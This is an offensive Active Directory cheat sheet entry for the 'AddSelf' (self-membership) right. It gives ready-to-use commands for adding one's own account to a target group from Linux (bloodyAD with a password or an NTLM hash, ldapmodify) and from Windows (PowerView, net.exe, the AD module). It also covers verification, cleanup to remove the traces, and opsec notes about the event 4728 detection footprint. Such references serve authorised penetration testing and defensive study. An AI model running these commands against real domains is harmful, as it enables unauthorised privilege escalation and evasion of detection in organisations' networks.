AddSelf
Source can add itself to the target group (Self-Membership extended right)
Applies to: User → Group
Linux Abuse
bloodyAD — add self to group
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
add groupMember '<target-group>' '<username>'
bloodyAD — add self with hash
bloodyad -u <username> --hashes :<ntlm-hash> -d <domain> --host <dc-ip> \
add groupMember '<target-group>' '<username>'
ldapmodify (self-membership)
ldapmodify -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' <<EOF
dn: CN=<target-group>,CN=Users,DC=<domain>,DC=<tld>
changetype: modify
add: member
member: CN=<username>,CN=Users,DC=<domain>,DC=<tld>
EOF
Windows Abuse
PowerView
Add-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred
CMD / net.exe
net group '<target-group>' <username> /add /domain
AD Module
Add-ADGroupMember -Identity '<target-group>' -Members '<username>'
Verify
Get-DomainGroupMember -Identity '<target-group>' | Where-Object {$_.MemberName -eq '<username>'}
Cleanup (remove self after done)
Remove-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred
Opsec
- Self-membership writes generate event 4728 on DC
- Functionally identical to AddMember but source can only add itself — less powerful than AddMember but same detection footprint